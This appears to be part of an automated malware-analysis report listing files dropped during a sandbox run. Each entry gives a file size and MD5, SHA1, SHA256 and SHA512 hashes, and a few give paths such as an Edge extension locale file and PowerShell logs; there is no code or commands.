SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Filesize 10KB
MD5 7bf2a304504d2352e363cf479860d86b
SHA1 4f22f83015d67cbc37ba2b983225037ba3762438
SHA256 0f4988f21de3c050a39478cab9e4d8279dbe87ad2797f3e4b6d15045963dfabb
SHA512 d55f31bc06eee3502f63ae4083e6f88b033fb7b4c4ecabb8d1b5fa42df60db7dd5f9f259e32c2d9fd04b58ff1b988f056c308829b2675cbc5e19db8d4dc0bb64

Filesize 34KB
MD5 e39efb096030f98301d6f410a185deb2
SHA1 1c27179040105d7d7f1850ba5f81552d7a8a6945
SHA256 59db8c4843bdd5262a82f0d82e8cf9b6caf95c714050e7dd0891440a154881e3
SHA512 540b5b0c05aee7658719428320508239aa220b3dc5f825232e7ae715374baee182b396a9db96de2958af4bff947040b27aa9efd678ff870d55a97540019d0ee6

Filesize 2KB
MD5 88dc70c361a22feac57b031dd9c1f02f
SHA1 a9b4732260c2a323750022a73480f229ce25d46d
SHA256 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA512 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize 151B
MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

Filesize 64B
MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Filesize 6.9MB
MD5 ea99e72c1ac89aa9cc14178b1c46d50d
SHA1 60b896781f40e89106d0c76abd11c5b5d0832943
SHA256 9cd503eed313e3c5293f192804c0f20a4eef448876f8375fbc26a25be36d5b28
SHA512 03693bda0c8b693c09e416a7d0c335294f74804f336058a59612a07aa0dd918cd70958cc95feba7d3b26b2df235b0a60d0347d6ed6e353fec8c87c969f6068f1

Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize 6KB
MD5 fd32f426f911fc34af1e4491e6270fe1
SHA1 a057c666b04b3335e46ca1b4dbbf53d4db739743
SHA256 b63b8bedb939fe820d18bf24f7dcb1dffdd6c0a94a07bd3e56e421a5ec41610d
SHA512 3ed361f0dfbfc67f3bdc0ad5e105fb1d17c3127fe25bc74359ce1bae97a05868654362f0da68f1f8c02269aa52ff6140a086f1dd1bdc695c8e83d09d9e2b9a73

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize 1KB
MD5 5b74da6778ccaa0e1ca4ae7484775943
SHA1 0a2f6f315a0ca1a0366b509aec7b13c606645654
SHA256 172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78
SHA512 20b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 11KB
MD5 5842dbf59e51aa9cc6f3634e55edf298
SHA1 f5071496f016da26a2eaa8b598478689ea95efdc
SHA256 8142922b90dbf92f40777c9597e9bb144c06503d54bd0de5f3c05176f2f3bd48
SHA512 c9bbfa7ef903e7cf8463ff6ff1e3f2af25b7a5c44852188ec99ebb7a581c307296f9fb0fb5c84e412a7e5bf352b25277439561e325514eb7eaed827edb8014b2

Filesize 6.3MB
MD5 fdcc0ef7b4cb82035c51f55cfece6cf1
SHA1 ee1d2e870309f5ba05e0216d3ea909c1ae9d8ee4
SHA256 7c3415f11576e09a0910da101422f044162b11607aa670452843436925d8c26b
SHA512 05d9e81255dfbd647198b4f9d13c420f3f8d56a235ebbec301d7006597bec72b4bfa0dc7e8e1f76de4e9d16b5e95a9f5c585bbdb4ce5fe98cade2872dffccf3a

Filesize 6KB
MD5 af5a6b277700c3d5f2b18476dc79bf88
SHA1 cd73d9b216467ce5ef9c4ed007f21506bdcda9ce
SHA256 3bd8efb7779a1f95f313b9e441b865476c5ba63acfdebf0b6647413451b58ec9
SHA512 27649baa11485fb0f10638344c934df823c1546abb396f12ee1932bc03c663d6186c3b7720d6cbb7d3afe7b2765713e896d67cca02d736fd65142b4a1b30d611

Filesize 268B
MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732